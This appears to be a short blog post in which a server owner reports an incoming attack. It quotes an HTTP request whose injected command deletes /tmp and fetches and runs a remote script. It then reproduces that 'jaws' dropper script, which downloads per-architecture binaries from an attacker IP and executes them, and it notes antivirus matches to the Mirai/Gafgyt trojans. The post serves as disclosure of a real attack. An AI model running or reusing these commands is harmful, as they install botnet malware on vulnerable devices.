So, once upon a time, my server was visited by 91.92.244.94
, which sent this HTTP request.
GET /shell?cd+/tmp;rm+-rf+*;wget+193.233.203.76/jaws;sh+/tmp/jaws HTTP/1.1
Remove everything from /tmp
folder, download 193.233.203.76/jaws
, then execute it.
Here is the content of the jaws
file.
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; cat db0fa4b8db0333367e9bda3ab68b8042.mips > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; cat db0fa4b8db0333367e9bda3ab68b8042.mpsl > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; cat db0fa4b8db0333367e9bda3ab68b8042.arm > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; cat db0fa4b8db0333367e9bda3ab68b8042.arm5 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; cat db0fa4b8db0333367e9bda3ab68b8042.arm6 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; cat db0fa4b8db0333367e9bda3ab68b8042.arm7 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; cat db0fa4b8db0333367e9bda3ab68b8042.ppc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; cat db0fa4b8db0333367e9bda3ab68b8042.m68k > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; cat db0fa4b8db0333367e9bda3ab68b8042.spc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; cat db0fa4b8db0333367e9bda3ab68b8042.i686 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; cat db0fa4b8db0333367e9bda3ab68b8042.sh4 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; cat db0fa4b8db0333367e9bda3ab68b8042.arc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
Change the current directory, download some files (each one for each CPU architecture), set its executable flag, then execute it by using "jaws.exploit" parameter.
For archival purposes, I already downloaded all those executables here.
I wish some security researchers could find out what these executables actually do.
http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
URL check : MIRAI
db0fa4b8db0333367e9bda3ab68b8042.x86
executable file sha256 sum hash check : trojan.mirai/gafgyt